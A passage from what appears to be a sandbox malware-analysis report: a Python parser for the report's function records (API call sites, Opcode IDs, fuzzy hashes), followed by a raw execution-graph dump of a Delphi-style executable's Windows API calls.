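The function records above share one fixed layout: an `APIs` list of `Name.MODULE(args), ref: address` lines, then `Strings`, `Memory Dump Source`, `Joe Sandbox IDA Plugin` and `Similarity` sections of `• key: value` lines. The parser below is an added example, not code from Joe Sandbox or from this report; it turns that text into records so call sites can be pivoted to IDA addresses and two samples' reports can be matched by Opcode ID. The embedded `SAMPLE` is a constructed excerpt copied from two of the records above (the second trimmed to its `APIs` and `Similarity` sections); the argument split on commas is a heuristic, since the plugin does not quote string arguments.

```python
import re
from dataclasses import dataclass, field

# Constructed excerpt: two function records from this report, copied in the
# plugin's own layout (the second one trimmed to its APIs and Similarity sections).
SAMPLE = """\
APIs
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
• ExitProcess.KERNEL32 ref: 00403DE5
Strings
Memory Dump Source
• Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ExitMessageProcess
• String ID: Error$Runtime error at 00000000$9@
• API String ID: 1220098344-1503883590
• Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
• Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
APIs
• VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,$F,?,?,?,00401800), ref: 004014B2
• VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,$F,?,?,?,00401800), ref: 004014D7
• VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,$F,?,?,?,00401800), ref: 004014FD
Similarity
• API ID: Virtual$Alloc$Free
• String ID: $F$4F
• API String ID: 3668210933-545788489
• Opcode ID: 53fb4fb4dead2bf9bf87b2a1222c08a4795459efffcdd9b971e00269c0061a0c
• Instruction Fuzzy Hash: 7CF0C8717403106AEB316E694CC5F533AD89F85754F1040BAFA0DFF3DAD6745800826C
"""

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR" (the argument list is optional)
API_RE = re.compile(r"^•\s*(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)   # (api, module, args tuple, ref address as int)
    meta: dict = field(default_factory=dict)   # "Opcode ID", "Instruction Fuzzy Hash", "Source File", ...


def parse_records(text):
    """Split the plugin dump into one FunctionRecord per 'APIs' header."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
            if section == "APIs":              # every record opens with its API list
                current = FunctionRecord()
                records.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(line) if section == "APIs" else None
        if m:
            api, module, args, ref = m.groups()
            arg_tuple = tuple(a.strip() for a in args.split(",")) if args else ()
            current.apis.append((api, module, arg_tuple, int(ref, 16)))
            continue
        m = KV_RE.match(line)
        if m:
            current.meta[m.group(1).strip()] = m.group(2).strip()
    return records


def calls_to(records, api):
    """Every call site of `api` across all records, as (ref address, module)."""
    return [(ref, mod) for r in records for name, mod, _, ref in r.apis if name == api]


def index_by_opcode_id(records):
    """Opcode ID -> record: the key to match functions across two samples' reports."""
    return {r.meta["Opcode ID"]: r for r in records if "Opcode ID" in r.meta}


def dump_base(record):
    """Module base from the 'Source File ... Offset: 00400000' line (None if absent)."""
    m = re.search(r"Offset:\s*([0-9A-Fa-f]+)", record.meta.get("Source File", ""))
    return int(m.group(1), 16) if m else None


if __name__ == "__main__":
    for r in parse_records(SAMPLE):
        print(r.meta.get("API ID"), [f"{name}@{ref:08X}" for name, _, _, ref in r.apis])
```

Running the file prints one line per record with its API call sites. `calls_to` is the pivot from the report to the addresses to open in IDA (the `ref` values are image addresses, so no rebasing is needed when the dump base from `dump_base` equals the PE's preferred base), and `index_by_opcode_id` keys records by the Opcode ID the Similarity section reports, which is the stable handle for comparing this sample's functions with another report's.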

                                                                                    Execution Graph

                                                                                    Execution Coverage:14.4%
                                                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                                                    Signature Coverage:4.5%
                                                                                    Total number of Nodes:2000
                                                                                    Total number of Limit Nodes:91
                                                                                    execution_graph: rendered in the original report as an interactive call graph; the flattened node/edge dump behind it is not reproduced here. Each node carries a function address and, where the node wraps API calls, the API names. Most nodes are memory-manager, locale and window-message housekeeping (RtlInitializeCriticalSection/RtlEnterCriticalSection/LocalAlloc/RtlLeaveCriticalSection, VirtualAlloc/VirtualFree, TlsSetValue/TlsGetValue, GetSystemDefaultLCID/GetLocaleInfoA, NtdllDefWindowProc_A, SetWindowLongA/GetWindowLongA/SetPropA, IsIconic, GetFocus/SetFocus, ShowWindow, SystemParametersInfoA, EnumWindows/SetWindowPos, LoadIconA/LoadStringA, VariantClear), a pattern consistent with a compiled Delphi/Object Pascal runtime and VCL (an inference from the API mix, not a report finding). The roots shown are 0x40cf00 (CloseHandle at 0x406f50), 0x402584 (memory-manager paths), 0x41364c (window subclassing via SetWindowLongA/GetWindowLongA/SetPropA) and 0x490c98. The subgraph rooted at 0x490c98 is where the non-housekeeping calls sit: it dispatches into nodes calling Sleep (0x490cd7), FindWindowA (0x490d08, 0x490d42), SendMessageA (0x490d9a, 0x490ed5), PostMessageA (0x490df0, 0x490f23), SendNotifyMessageA (0x490e4c, 0x490f77), RegisterClipboardFormatA (0x490e8c), SetErrorMode (0x42e2bc), GetLastError (0x490fd7), GetProcAddress (0x49102b), FreeLibrary (0x49109a), CreateMutexA (0x4910d9), OemToCharBuffA (0x491114) and CharToOemBuffA (0x491157).
52983->52867 52984->52876 52985->52882 52986->52887 52987->52870 52988->52878 52989->52883 52990->52892 52991->52894 52992->52893 52993->52899 52994->52903 52995->52902 52996->52909 52997->52915 52998->52887 52999->52910 53000->52917 53001->52924 53002->52894 53049 403738 53003->53049 53006->52942 53007->52951 53008->52955 53009->52887 53010->52887 53011->52938 53012->52894 53013->52958 53014->52894 53015->52964 53016->52894 53019 403426 53017->53019 53018 40344b 53019->53018 53020 402660 4 API calls 53019->53020 53020->53019 53022 4358d8 53021->53022 53023 4358fa 53021->53023 53022->53023 53041 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53022->53041 53024 43597d 53023->53024 53026 435941 53023->53026 53027 435971 53023->53027 53028 435965 53023->53028 53029 435959 53023->53029 53030 43594d 53023->53030 53046 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53024->53046 53042 403510 53026->53042 53045 4040e8 18 API calls 53027->53045 53032 403494 4 API calls 53028->53032 53029->52970 53036 403510 4 API calls 53030->53036 53038 43596e 53032->53038 53035 43598e 53035->52970 53037 435956 53036->53037 53037->52970 53038->52970 53039 43597a 53039->52970 53041->53023 53043 4034e0 4 API calls 53042->53043 53044 40351d 53043->53044 53044->52970 53045->53039 53046->53035 53047->52974 53048->52975 53050 40373c LoadLibraryA 53049->53050 53050->52926 53051 416b52 53052 416bfa 53051->53052 53053 416b6a 53051->53053 53070 41532c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53052->53070 53055 416b84 SendMessageA 53053->53055 53056 416b78 53053->53056 53066 416bd8 53055->53066 53057 416b82 CallWindowProcA 53056->53057 53058 416b9e 53056->53058 53057->53066 53067 41a068 GetSysColor 53058->53067 53061 416ba9 SetTextColor 53062 416bbe 53061->53062 53068 41a068 GetSysColor 53062->53068 53064 416bc3 SetBkColor 53069 41a6f0 GetSysColor CreateBrushIndirect 53064->53069 53067->53061 53068->53064 53069->53066 53070->53066 53071 416654 53072 416661 53071->53072 53073 
4166bb 53071->53073 53078 416560 CreateWindowExA 53072->53078 53074 416668 SetPropA SetPropA 53074->53073 53075 41669b 53074->53075 53076 4166ae SetWindowPos 53075->53076 53076->53073 53078->53074 53079 42e317 SetErrorMode 53080 42f394 53081 42f3a3 NtdllDefWindowProc_A 53080->53081 53082 42f39f 53080->53082 53081->53082 53083 4162da 53084 416306 53083->53084 53085 4162e6 GetClassInfoA 53083->53085 53085->53084 53086 4162fa GetClassInfoA 53085->53086 53086->53084 53087 48fed4 53088 48ff0e 53087->53088 53089 48ff1a 53088->53089 53090 48ff10 53088->53090 53092 48ff29 53089->53092 53093 48ff52 53089->53093 53282 4090a0 MessageBeep 53090->53282 53094 44684c 18 API calls 53092->53094 53100 48ff8a 53093->53100 53101 48ff61 53093->53101 53097 48ff36 53094->53097 53095 403420 4 API calls 53096 490566 53095->53096 53098 403400 4 API calls 53096->53098 53283 406bb8 53097->53283 53102 49056e 53098->53102 53107 48ff99 53100->53107 53108 48ffc2 53100->53108 53104 44684c 18 API calls 53101->53104 53106 48ff6e 53104->53106 53291 406c08 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53106->53291 53110 44684c 18 API calls 53107->53110 53115 48ffea 53108->53115 53116 48ffd1 53108->53116 53112 48ffa6 53110->53112 53111 48ff79 53292 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53111->53292 53293 406c3c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53112->53293 53122 48fff9 53115->53122 53123 49001e 53115->53123 53295 407288 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 53116->53295 53117 48ffb1 53294 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53117->53294 53119 48ffd9 53296 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53119->53296 53124 44684c 18 API calls 53122->53124 53126 49002d 53123->53126 53127 490056 53123->53127 53125 490006 53124->53125 53297 4072b0 53125->53297 53129 44684c 18 API calls 53126->53129 53134 49008e 53127->53134 53135 490065 53127->53135 53131 49003a 53129->53131 53130 
49000e 53300 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53130->53300 53301 42c7d0 53131->53301 53140 4900da 53134->53140 53141 49009d 53134->53141 53137 44684c 18 API calls 53135->53137 53139 490072 53137->53139 53311 407200 8 API calls 53139->53311 53147 4900e9 53140->53147 53151 490112 53140->53151 53143 44684c 18 API calls 53141->53143 53145 4900ac 53143->53145 53144 49007d 53312 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53144->53312 53149 44684c 18 API calls 53145->53149 53150 44684c 18 API calls 53147->53150 53148 48ff15 53148->53095 53152 4900bd 53149->53152 53153 4900f6 53150->53153 53156 49014a 53151->53156 53157 490121 53151->53157 53313 48fbd8 8 API calls 53152->53313 53315 42c870 53153->53315 53164 490159 53156->53164 53165 490182 53156->53165 53160 44684c 18 API calls 53157->53160 53158 4900c9 53314 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53158->53314 53163 49012e 53160->53163 53321 42c898 53163->53321 53167 44684c 18 API calls 53164->53167 53172 4901ba 53165->53172 53173 490191 53165->53173 53169 490166 53167->53169 53330 42c8c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 53169->53330 53179 4901c9 53172->53179 53180 4901f2 53172->53180 53175 44684c 18 API calls 53173->53175 53174 490171 53331 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53174->53331 53176 49019e 53175->53176 53332 42c8f8 53176->53332 53182 44684c 18 API calls 53179->53182 53185 49023e 53180->53185 53186 490201 53180->53186 53184 4901d6 53182->53184 53338 42c920 53184->53338 53193 49024d 53185->53193 53194 490290 53185->53194 53188 44684c 18 API calls 53186->53188 53190 490210 53188->53190 53192 44684c 18 API calls 53190->53192 53195 490221 53192->53195 53196 44684c 18 API calls 53193->53196 53201 49029f 53194->53201 53202 490303 53194->53202 53344 42c4c4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 53195->53344 53197 490260 53196->53197 53199 44684c 18 
API calls 53197->53199 53203 490271 53199->53203 53200 49022d 53345 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53200->53345 53205 44684c 18 API calls 53201->53205 53209 490342 53202->53209 53210 490312 53202->53210 53346 48fdd0 12 API calls 53203->53346 53207 4902ac 53205->53207 53274 42c5d4 7 API calls 53207->53274 53208 49027f 53347 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53208->53347 53219 490381 53209->53219 53220 490351 53209->53220 53213 44684c 18 API calls 53210->53213 53215 49031f 53213->53215 53214 4902ba 53216 4902be 53214->53216 53217 4902f3 53214->53217 53350 451f68 53215->53350 53218 44684c 18 API calls 53216->53218 53349 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53217->53349 53224 4902cd 53218->53224 53229 4903c0 53219->53229 53230 490390 53219->53230 53225 44684c 18 API calls 53220->53225 53223 49032c 53357 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53223->53357 53275 4522e0 53224->53275 53228 49035e 53225->53228 53358 451dd0 53228->53358 53239 490408 53229->53239 53240 4903cf 53229->53240 53233 44684c 18 API calls 53230->53233 53231 4902dd 53348 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53231->53348 53236 49039d 53233->53236 53235 49036b 53365 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53235->53365 53366 452470 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 53236->53366 53245 490450 53239->53245 53246 490417 53239->53246 53242 44684c 18 API calls 53240->53242 53241 4903aa 53367 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53241->53367 53244 4903de 53242->53244 53247 44684c 18 API calls 53244->53247 53251 490463 53245->53251 53258 490519 53245->53258 53248 44684c 18 API calls 53246->53248 53249 4903ef 53247->53249 53250 490426 53248->53250 53253 446acc 5 API calls 53249->53253 53252 44684c 18 API calls 53250->53252 53254 
44684c 18 API calls 53251->53254 53255 490437 53252->53255 53253->53148 53256 490490 53254->53256 53261 446acc 5 API calls 53255->53261 53257 44684c 18 API calls 53256->53257 53259 4904a7 53257->53259 53258->53148 53371 4467f0 18 API calls 53258->53371 53368 407de4 7 API calls 53259->53368 53261->53148 53262 490532 53372 42e73c FormatMessageA 53262->53372 53267 4904c9 53268 44684c 18 API calls 53267->53268 53269 4904dd 53268->53269 53369 408510 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53269->53369 53271 4904e8 53370 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53271->53370 53273 4904f4 53274->53214 53377 451d84 53275->53377 53277 4522f9 53278 4522fd 53277->53278 53279 452321 MoveFileA GetLastError 53277->53279 53278->53231 53383 451dc0 53279->53383 53282->53148 53284 406bc7 53283->53284 53285 406be0 53284->53285 53286 406be9 53284->53286 53287 403400 4 API calls 53285->53287 53386 403778 53286->53386 53288 406be7 53287->53288 53290 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53288->53290 53290->53148 53291->53111 53292->53148 53293->53117 53294->53148 53295->53119 53296->53148 53298 403738 53297->53298 53299 4072ba SetCurrentDirectoryA 53298->53299 53299->53130 53300->53148 53302 403738 53301->53302 53303 42c7f3 GetFullPathNameA 53302->53303 53304 42c816 53303->53304 53305 42c7ff 53303->53305 53307 403494 4 API calls 53304->53307 53305->53304 53306 42c807 53305->53306 53308 4034e0 4 API calls 53306->53308 53309 42c814 53307->53309 53308->53309 53310 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53309->53310 53310->53148 53311->53144 53312->53148 53313->53158 53314->53148 53393 42c768 53315->53393 53318 403778 4 API calls 53319 42c891 53318->53319 53320 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53319->53320 53320->53148 53408 42c640 53321->53408 53324 42c8b5 53327 403778 4 API calls 53324->53327 53325 42c8ac 53326 403400 4 API calls 53325->53326 53328 42c8b3 53326->53328 
53327->53328 53329 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53328->53329 53329->53148 53330->53174 53331->53148 53333 42c768 IsDBCSLeadByte 53332->53333 53334 42c908 53333->53334 53335 403778 4 API calls 53334->53335 53336 42c91a 53335->53336 53337 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53336->53337 53337->53148 53339 42c768 IsDBCSLeadByte 53338->53339 53340 42c930 53339->53340 53341 403778 4 API calls 53340->53341 53342 42c941 53341->53342 53343 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53342->53343 53343->53148 53344->53200 53345->53148 53346->53208 53347->53148 53348->53148 53349->53148 53351 451d84 2 API calls 53350->53351 53352 451f7e 53351->53352 53353 451f82 53352->53353 53354 451f9e DeleteFileA GetLastError 53352->53354 53353->53223 53355 451dc0 Wow64RevertWow64FsRedirection 53354->53355 53356 451fc4 53355->53356 53356->53223 53357->53148 53359 451d84 2 API calls 53358->53359 53360 451de6 53359->53360 53361 451dea 53360->53361 53362 451e08 CreateDirectoryA GetLastError 53360->53362 53361->53235 53363 451dc0 Wow64RevertWow64FsRedirection 53362->53363 53364 451e2e 53363->53364 53364->53235 53365->53148 53366->53241 53367->53148 53368->53267 53369->53271 53370->53273 53371->53262 53373 42e762 53372->53373 53374 4034e0 4 API calls 53373->53374 53375 42e77f 53374->53375 53376 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53375->53376 53376->53148 53378 451d92 53377->53378 53379 451d8e 53377->53379 53380 451db4 SetLastError 53378->53380 53381 451d9b Wow64DisableWow64FsRedirection 53378->53381 53379->53277 53382 451daf 53380->53382 53381->53382 53382->53277 53384 451dc5 Wow64RevertWow64FsRedirection 53383->53384 53385 451dcf 53383->53385 53384->53385 53385->53231 53387 4037aa 53386->53387 53389 40377d 53386->53389 53388 403400 4 API calls 53387->53388 53392 4037a0 53388->53392 53389->53387 53390 403791 53389->53390 53391 4034e0 4 API calls 53390->53391 53391->53392 
53392->53288 53398 42c648 53393->53398 53395 42c7c7 53395->53318 53396 42c77d 53396->53395 53405 42c454 IsDBCSLeadByte 53396->53405 53401 42c659 53398->53401 53399 42c6bd 53402 42c6b8 53399->53402 53407 42c454 IsDBCSLeadByte 53399->53407 53401->53399 53404 42c677 53401->53404 53402->53396 53404->53402 53406 42c454 IsDBCSLeadByte 53404->53406 53405->53396 53406->53404 53407->53402 53409 42c648 IsDBCSLeadByte 53408->53409 53410 42c647 53409->53410 53410->53324 53410->53325 53411 46ad18 53412 46ad4e 53411->53412 53446 46b037 53411->53446 53413 46ad8a 53412->53413 53416 46add4 53412->53416 53417 46ade5 53412->53417 53418 46adb2 53412->53418 53419 46adc3 53412->53419 53420 46ada1 53412->53420 53413->53446 53506 4683b4 53413->53506 53414 403400 4 API calls 53421 46b071 53414->53421 53687 46aa98 67 API calls 53416->53687 53688 46aca8 45 API calls 53417->53688 53686 46a790 42 API calls 53418->53686 53471 46a8d8 53419->53471 53451 46a628 53420->53451 53422 403400 4 API calls 53421->53422 53428 46b079 53422->53428 53429 46ae1e 53442 46ae60 53429->53442 53429->53446 53689 493200 53429->53689 53432 46af71 53708 481938 123 API calls 53432->53708 53435 46af84 53435->53446 53436 42cb8c 6 API calls 53436->53442 53438 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53438->53442 53442->53432 53442->53436 53442->53438 53443 414af8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53442->53443 53444 46b01a 53442->53444 53445 46afd8 53442->53445 53442->53446 53509 4682f0 53442->53509 53517 469f08 53442->53517 53524 469640 53442->53524 53577 469fe8 53442->53577 53615 48146c 53442->53615 53717 46a3e4 19 API calls 53442->53717 53443->53442 53447 469fe8 23 API calls 53444->53447 53709 457114 53445->53709 53446->53414 53447->53446 53450 457114 24 API calls 53450->53444 53718 414af8 53451->53718 53453 46a69b 53455 46a6a1 53453->53455 53456 46a6d8 53453->53456 53454 46a65a 53454->53453 53459 493200 18 API calls 53454->53459 53460 46a6c3 53455->53460 53722 46c45c 53455->53722 53457 46a6e4 
GetCursor LoadCursorA SetCursor Sleep SetCursor 53456->53457 53458 46a70d 53456->53458 53457->53458 53731 47d508 42 API calls 53458->53731 53459->53453 53726 414b28 53460->53726 53464 46a721 53466 46a6d6 53464->53466 53468 414b28 4 API calls 53464->53468 53469 403400 4 API calls 53466->53469 53467 403450 4 API calls 53467->53460 53468->53466 53470 46a766 53469->53470 53470->53413 53744 46b4a8 53471->53744 53474 46aa5a 53476 403420 4 API calls 53474->53476 53475 414af8 4 API calls 53477 46a926 53475->53477 53478 46aa74 53476->53478 53479 46aa46 53477->53479 53747 4554a0 13 API calls 53477->53747 53480 403400 4 API calls 53478->53480 53479->53474 53482 403450 4 API calls 53479->53482 53483 46aa7c 53480->53483 53482->53474 53484 403400 4 API calls 53483->53484 53485 46aa84 53484->53485 53485->53413 53486 46aa09 53486->53474 53486->53479 53491 42cd14 7 API calls 53486->53491 53488 46a9a9 53488->53474 53488->53486 53757 42cd14 53488->53757 53490 46a944 53490->53488 53748 465d14 53490->53748 53493 46aa1f 53491->53493 53493->53479 53498 450ab8 4 API calls 53493->53498 53497 465d14 19 API calls 53500 46a984 53497->53500 53501 46aa36 53498->53501 53752 450a88 53500->53752 53764 47d508 42 API calls 53501->53764 53507 4682f0 19 API calls 53506->53507 53508 4683c3 53507->53508 53508->53429 53510 46831f 53509->53510 53511 4078fc 19 API calls 53510->53511 53514 468360 53510->53514 53512 468358 53511->53512 53983 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53512->53983 53515 403400 4 API calls 53514->53515 53516 468378 53515->53516 53516->53442 53518 469f14 53517->53518 53519 469f19 53517->53519 53520 469f17 53518->53520 53984 469974 53518->53984 54069 4691c0 46 API calls 53519->54069 53520->53442 53522 469f21 53522->53442 53525 403400 4 API calls 53524->53525 53526 46966d 53525->53526 54419 47c564 53526->54419 53528 469692 53529 469696 53528->53529 53530 4696ac 53528->53530 54437 465f14 53529->54437 53532 4696a0 53530->53532 54440 4930f0 LocalAlloc TlsSetValue 
TlsGetValue TlsGetValue 53530->54440 53535 469771 53532->53535 53536 4697dc 53532->53536 53576 4698a5 53532->53576 53534 403420 4 API calls 53538 4698e1 53534->53538 53539 403494 4 API calls 53535->53539 53540 403494 4 API calls 53536->53540 53537 4696c8 53537->53532 53541 4696d0 53537->53541 53538->53442 53542 46977e 53539->53542 53543 4697e9 53540->53543 53544 469fe8 23 API calls 53541->53544 53545 40357c 4 API calls 53542->53545 53546 40357c 4 API calls 53543->53546 53547 4696dd 53544->53547 53548 46978b 53545->53548 53549 4697f6 53546->53549 54441 42f3d4 53547->54441 53551 40357c 4 API calls 53548->53551 53552 40357c 4 API calls 53549->53552 53554 469798 53551->53554 53555 469803 53552->53555 53558 40357c 4 API calls 53554->53558 53559 40357c 4 API calls 53555->53559 53557 469724 53557->53442 53560 4697a5 53558->53560 53561 469810 53559->53561 53562 465f14 20 API calls 53560->53562 53563 40357c 4 API calls 53561->53563 53565 4697b3 53562->53565 53564 46981e 53563->53564 53567 414b28 4 API calls 53564->53567 53566 40357c 4 API calls 53565->53566 53568 4697bc 53566->53568 53569 4697da 53567->53569 53570 40357c 4 API calls 53568->53570 54458 46624c 53569->54458 53572 4697c9 53570->53572 53573 414b28 4 API calls 53572->53573 53573->53569 53576->53534 53578 4682f0 19 API calls 53577->53578 53580 46a000 53578->53580 53579 46a034 54620 4649f4 53579->54620 53580->53579 53581 4649f4 7 API calls 53580->53581 53581->53579 53585 46a04c 53587 46a09a 53585->53587 53588 46a133 53585->53588 54641 469f9c 19 API calls 53585->54641 53589 4682f0 19 API calls 53587->53589 53590 46a1f2 GetSystemMenu EnableMenuItem 53588->53590 53589->53588 53591 414b28 4 API calls 53590->53591 53592 46a212 53591->53592 53593 46a21e 53592->53593 53594 46a248 53592->53594 53595 414b28 4 API calls 53593->53595 53596 46a264 53594->53596 53597 46a28e 53594->53597 53598 46a232 53595->53598 53599 414b28 4 API calls 53596->53599 53600 414b28 4 API calls 53597->53600 53601 414b28 4 API calls 53598->53601 
53602 46a278 53599->53602 53603 46a2a2 53600->53603 53604 46a246 53601->53604 53605 414b28 4 API calls 53602->53605 53606 414b28 4 API calls 53603->53606 54637 469f30 53604->54637 53605->53604 53606->53604 53609 4683b4 19 API calls 53613 46a340 53609->53613 53611 46a2e0 53611->53609 53612 46a3a3 53612->53442 53613->53612 54643 49314c 18 API calls 53613->54643 53616 46b4a8 47 API calls 53615->53616 53617 4814af 53616->53617 53618 4814b8 53617->53618 54843 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53617->54843 53620 414af8 4 API calls 53618->53620 53621 4814c8 53620->53621 53622 403450 4 API calls 53621->53622 53623 4814d5 53622->53623 54663 46b7b8 53623->54663 53626 4814e5 53628 414af8 4 API calls 53626->53628 53629 4814f5 53628->53629 53630 403450 4 API calls 53629->53630 53631 481502 53630->53631 53632 468fa8 SendMessageA 53631->53632 53633 48151b 53632->53633 53634 481559 53633->53634 54845 478a14 23 API calls 53633->54845 53636 4241ec 11 API calls 53634->53636 53637 481563 53636->53637 53638 481589 53637->53638 53639 481574 SetActiveWindow 53637->53639 54692 480a68 53638->54692 53639->53638 53686->53413 53687->53413 53688->53413 56563 43d21c 53689->56563 53692 49322c 56568 431424 53692->56568 53693 4932b2 53694 4932c1 53693->53694 56601 492a28 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53693->56601 53694->53442 53703 493276 56599 492abc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53703->56599 53705 49328a 56600 433624 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53705->56600 53707 4932aa 53707->53442 53708->53435 53710 457139 53709->53710 53711 457159 53710->53711 53712 4078fc 19 API calls 53710->53712 53714 403400 4 API calls 53711->53714 53713 457151 53712->53713 53715 456f08 24 API calls 53713->53715 53716 45716e 53714->53716 53715->53711 53716->53450 53717->53442 53719 414b06 53718->53719 53720 4034e0 4 API calls 53719->53720 53721 414b13 53720->53721 53721->53454 53723 46a6b6 53722->53723 53724 46c465 53722->53724 
53723->53467 53732 46c53c 53724->53732 53727 414af8 4 API calls 53726->53727 53728 414b4c 53727->53728 53729 403400 4 API calls 53728->53729 53730 414b7d 53729->53730 53730->53466 53731->53464 53733 46c543 53732->53733 53736 45cf00 53733->53736 53737 45cf0b 53736->53737 53738 45cf26 VirtualAlloc 53737->53738 53739 45cf45 53738->53739 53740 45cf4a BZ2_bzDecompressInit 53738->53740 53739->53740 53743 45ce5c 19 API calls 53740->53743 53742 45cf8f 53742->53723 53743->53742 53765 46b534 53744->53765 53747->53490 53750 465d2e 53748->53750 53934 4078fc 53750->53934 53753 450aa8 53752->53753 53953 450960 53753->53953 53977 42cc98 53757->53977 53760 450ab8 53761 450a88 4 API calls 53760->53761 53762 450ad4 53761->53762 53763 47d508 42 API calls 53762->53763 53763->53486 53764->53479 53766 414af8 4 API calls 53765->53766 53767 46b566 53766->53767 53819 465fac 53767->53819 53770 414b28 4 API calls 53771 46b578 53770->53771 53772 46b587 53771->53772 53775 46b5a0 53771->53775 53868 47d508 42 API calls 53772->53868 53774 46b59b 53776 403420 4 API calls 53774->53776 53777 46b5e7 53775->53777 53779 46b5ce 53775->53779 53778 46a90a 53776->53778 53780 46b64c 53777->53780 53793 46b5eb 53777->53793 53778->53474 53778->53475 53869 47d508 42 API calls 53779->53869 53871 42cb18 CharNextA 53780->53871 53783 46b65b 53784 46b65f 53783->53784 53787 46b678 53783->53787 53872 47d508 42 API calls 53784->53872 53786 46b633 53870 47d508 42 API calls 53786->53870 53788 46b69c 53787->53788 53828 46611c 53787->53828 53873 47d508 42 API calls 53788->53873 53793->53786 53793->53787 53796 46b6b5 53797 403778 4 API calls 53796->53797 53798 46b6cb 53797->53798 53836 42c968 53798->53836 53801 46b6dc 53874 4661a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53801->53874 53802 46b70a 53804 42c898 5 API calls 53802->53804 53806 46b715 53804->53806 53805 46b6ef 53807 450ab8 4 API calls 53805->53807 53840 42c40c 53806->53840 53809 46b6fc 53807->53809 53875 47d508 42 API calls 53809->53875 53810 46b720 53850 
42cb8c 53810->53850 53824 465fc6 53819->53824 53821 42cb8c 6 API calls 53821->53824 53822 403450 4 API calls 53822->53824 53823 406bb8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53823->53824 53824->53821 53824->53822 53824->53823 53825 46600f 53824->53825 53877 42ca78 53824->53877 53826 403420 4 API calls 53825->53826 53827 466029 53826->53827 53827->53770 53829 466126 53828->53829 53831 466139 53829->53831 53907 42cb08 CharNextA 53829->53907 53831->53788 53832 46614c 53831->53832 53833 466156 53832->53833 53834 466183 53833->53834 53908 42cb08 CharNextA 53833->53908 53834->53788 53834->53796 53837 42c9c1 53836->53837 53838 42c97e 53836->53838 53837->53801 53837->53802 53838->53837 53909 42cb08 CharNextA 53838->53909 53841 42c416 53840->53841 53842 42c439 53840->53842 53910 42c948 CharPrevA 53841->53910 53844 403494 4 API calls 53842->53844 53845 42c442 53844->53845 53845->53810 53846 42c41d 53846->53842 53847 42c428 53846->53847 53911 4035c0 53847->53911 53849 42c436 53849->53810 53851 42c648 IsDBCSLeadByte 53850->53851 53854 42cb9d 53851->53854 53852 42cbc4 53854->53852 53933 42cb10 CharPrevA 53854->53933 53868->53774 53869->53774 53870->53774 53871->53783 53872->53774 53873->53774 53874->53805 53875->53774 53878 403494 4 API calls 53877->53878 53879 42ca88 53878->53879 53883 42cabe 53879->53883 53886 403744 53879->53886 53890 42c454 